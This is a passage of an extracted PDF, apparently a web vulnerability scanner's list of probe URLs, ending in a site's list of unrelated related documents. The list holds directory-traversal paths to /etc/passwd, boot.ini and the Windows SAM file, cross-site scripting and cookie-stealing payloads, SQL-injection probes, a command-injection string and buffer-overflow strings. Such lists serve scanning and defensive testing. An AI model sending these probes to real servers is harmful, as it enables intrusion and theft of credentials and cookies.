AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. . /.cobalt/siteUserMod.cgi /.cobalt/siteUserMod/siteUserMod.cgi /.cobalt/sysManage/../../../../../../../../../../../../etc/passwd /.cobalt/sysManage/../../../../../../etc/passwd /.cobalt/sysManage/../admin/.htaccess /.DS_Store /.FBCIndex /.FBCSemaphoreFile /.forward /.history /.htaccess /.HTACCESS. /.htaccess.old /.htaccess/ /.htaccess~ /.html/.../config.sys /.htpasswd /.htpasswd-girls /.htpasswd-members /.htpasswd.old /.htpasswd/ /.htpasswd//th1s1sns74lk3r404which1224703692.html /.htpasswd~ /.htpasswrd /.icons /.index /.iwestpass /.jpilot /.jpilot/ /.jsp /.jsp/WEB-INF/classes/Env.java /.login1.asp /.lynx_cookies /.members /.meta/ /.mysql_history /.ns4/../winnt/win.ini /.nsconfig /.nsf%00.nsf/../lotus/domino/notes.ini /.nsf%00.nsf/../winnt/win.ini

(27)

/.nsf.nsf/..//lotus/domino/notes.ini /.nsf.nsf/..//winnt/win.ini /.nsf.nsf//../lotus/domino/notes.ini /.nsf.nsf//../winnt/win.ini /.nsf/..///lotus/domino/notes.ini /.nsf/..///winnt/win.ini /.nsf/..//lotus/domino/notes.ini /.nsf/..//winnt/win.ini /.nsf/../lotus/domino/notes.ini /.nsf/../notes.ini /.nsf/../winnt/win.ini /.nsf//..//lotus/domino/notes.ini /.nsf//..//winnt/win.ini /.nsf//../lotus/domino/notes.ini /.nsf//../winnt/win.ini /.nsf///../lotus/domino/notes.ini /.nsf///../winnt/win.ini /.pass /.passes /.passwd /.password /.passwords /.passwrd /.perf /.photon/ /.pinerc /.plan /.printer /.proclog /.procmailrc /.profile /.psql_history /.pwd /.rhosts /.secure/ /.shtm /.shtml /.sh_history /.sploits/ /.ssh /.ssh/authorized_keys /.ssh/known_hosts /.stm /.Templates/ /.thtml /.userid.pwd /.users /.usersdb /.web/ /.wwwacl /.www_acl /.\/./cg%69-bin/./test%20cgi // //%22%3e%3cscript%3ealert(xss)%3c/script%3e //%3cimg%20src%3d%22javascript%3aalert(xss)%22%3e //.jsp/WEB-INF/classes/Env.java /// //// ////./../.../boot.ini //////////// /////////////

(28)

/////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// ////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// ///////////////////////////////////////////////////////////////////////////

(29)

/////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////// //////////////////////////... ////CON ///etc/hosts ///etc/passwd ///_vti_inf.html //?>'"><script>alert(xss)</script> //a.idq? aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaa //admin/admin.shtml //aux%00 //aux%00.jsp //icons/ //NoneExistent%0d%0aInjectedHeadernjectedValue //NUL/../../../../../../../../../WINNT/system32/ipconfig.exe //PRN/../../../../../../../../../WINNT/system32/ipconfig.exe //Scripts/tools //Sites/Knowledge/Membership/Inspired/ViewCode.asp?file=index.asp //Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp?file=index.asp //Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp?file=index.asp //Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp? file=index.asp //Sites/Samples/Knowledge/Push/ViewCode.asp?file=index.asp //Sites/Samples/Knowledge/Search/ViewCode.asp?file=index.asp //siteserver/publishing/viewcode.asp?file=index.asp //WEB-INF //WEB-INF/ /0/ /1,1&url=bla&title=bla /1/ /1223618186/ /123%0a%0a%3ealert(xss)%3b%3c/script%3e123.jsp /126471964 /14all-1.1.cgi /14all-1.1.cgi?cfg=../../../../../../../../etc/passwd /14all.cgi?cfg=../../../../../../../../etc/passwd /1929090552.old /2/ /2006/ /2007/ /2008/ /2600-cgi/ezmlm-cgi /2bgal/disp_album.php?id_album=' /2bgal/disp_album.php?id_album=1' /3/ /364332/ /367850337.idc /4/ /4830ed7a44601aca8488617f4b313ba4 /4DBin/_/../../../../../../../boot.ini /4DBin/_/../boot.ini

(30)

/4DBin/_/../inetpub/../boot.ini /4DBin/_/../winnt/repair/sam._ /4DBin/_/C:/inetpub/../boot.ini /4DBin/_/C:/winnt/repair/sam._ /5/ /6/ /666%0a%0a666.jsp /7/ /705495126.plx /8/ /852566C90012664F /857583/ /874840/ /9/ /999' /:/x.jsp /</index.jsp /<oot.ini /<script>alert("CSS");</script> /<script>alert('CSS')</script> /<script>alert('TRACE');</script> /<script>alert('Vulnerable')</script>.jsp /<script>alert('Vulnerable')</script>.shtm /<script>alert('Vulnerable')</script>.shtml /<script>alert('Vulnerable')</script>.stm /<script>alert('Vulnerable')</script>.thtml /<script>alert('XSS')</script> /<script>alert('XSS')</script>.jsp / <SCRIPT>alert('Your+log+viewing+software+is+vulnerable+to+cross+site+script ing+attacks.')</SCRIPT> /<script>alert(document.domain)</script> /<script>alert(xss);</script>.cfm /<script>alert(xss)</script> /<script>alert(xss)</script>.cfm /<script>alert(xss)</script>.cfml /<script>alert(xss)</script>.shtml /<script>alert(xss)</script>.stm />+ACJ-+AD4APB-SCRIPT/TYPE=TEXT/VBSCRIPT+AD7-MSGBOX(xss) +AA0APB-/SCRIPT+AD7-/>/index.jsp />/nonexistent.jsp />/noSuchFile.jsp /?%3E%27%22%3E%3Cscript%3Ealert%2810826%29%3C%2Fscript%3E=123 /?%3E%27%22%3E%3Cscript%3Ealert%2810830%29%3C%2Fscript%3E=123 /?=>"'><ScRiPt>alert(xss)</ScRiPt> /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 /?>"'><ScRiPt>alert(xss)</ScRiPt> /?>'"><script>alert(xss)</script> /?><script>alert('XSS');</1436098301/ /?><script>alert('XSS');</script> /? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

(31)

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA... /?act=SR&f='><script>alert(document.cookie)</script> /?action=viewgallery&type=album&aid=&page=-1%27 /?archive&ctg=%27 /?c='><script>alert(document.cookie)</script>

(32)

/?D=A /?feed=rss2&p=11%27 /?foo=too&hop=&gazon=zz /?gallery=gallery/includes/admin.class.php /?ilang=eng&SID=&%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E /?ilang=eng&SID=2%22%3Cscript%3Ealert(xss);%3C/script%3E /?lng=<script>alert(document.cookie);</script> /?M=A /?N=D /?Open /?OpenServer /?order_num=abcd&payment= %22>&lt;script&gt;alert(xss)&lt;/script&gt;&send=first&send=regular&send=pr iority&send=express /?p=unsubscribe&id=1&unsubscribeemail=%22%3E%3Cscript%3Ealert%28xss%29%3C %2Fscript%3E /?page=/../../../../../../../../boot.ini%00 /?page=/../../../../../../../../etc/passwd%00 /?page=/../../../../../../../../winnt/win.ini%00 /?page=shop%2Fflypage&product_id=-3%27 /?pageid=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E /?PageServices /?page_id=115&forumaction=showprofile&user=%27 /?properties /?result=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E /?s=%2C /?S=A /?S=D /?showuser='><script>alert(document.cookie)</script> /?sql_debug=1 /?user=&error=<script>alert('XSS');</script> /?wp-cs-dump /?wp-cs-dump /?wp-html-rend /?wp-start-ver /?wp-stop-ver /?wp-uncheckout /?wp-usr-prop /?wp-ver-diff /?wp-ver-info /?wp-verify-link /?\ /?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|. %2F.|.%2F.|.%2Fetc%2Fpasswd /@1224703632@ /a%5c.aspx /a.asp/..%c1%1c../..%c1%1c../winnt/win.ini /a.ida? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=5 /a.ida? aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa /a.idq? aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa

(33)

/a.jsp/ /a.jsp//..//..//..//..//..//../winnt/win.ini /a.jsp/<SCRIPT>alert('vulnerable')</SCRIPT> /a.out /a/ /a1disp3.cgi?../../../../../../../../../../etc/passwd /a1disp3.cgi?/../../../../../../etc/passwd /a1stats/ /a1stats/a1disp.cgi?|/bin/ls| /a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd /a1stats/a1disp4.cgi?../../../../../../../etc/hosts /a? /a?x=<SCRIPT>alert('vulnerable')</SCRIPT> / aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaa/ / aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.plx / AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA / aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert(xss)</script>.idc / AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

References

Download now ( PDF - 378 Page - 549.96 KB )

Related documents

Bharti AXA Life Wealth Pro A Unit Linked, Non-Participating Individual Life Insurance Plan

be applied. In case the Policyholder does not exercise the option as set out above, the Policy shall continue without any risk cover and rider cover, if any, and the policy

Bringing Employment First to Scale: Pushing the Integrated Employment Agenda: A Case Study of Maryland’s High-Performing Employment System

Data was collected from a wide variety of sources, including publicly available policy and practice documents from the state IDD, VR, and education departments; expert interviews

Martin KREUTNER, Chair IACA International Steering Committee; Inaugural Conference 02 September 2010

The idea was to set up a pioneer institution that would overcome current shortcomings in knowledge and practice in the field of anti-corruption; namely,

Informatica Cloud Connector for SharePoint 2010/2013 User Guide

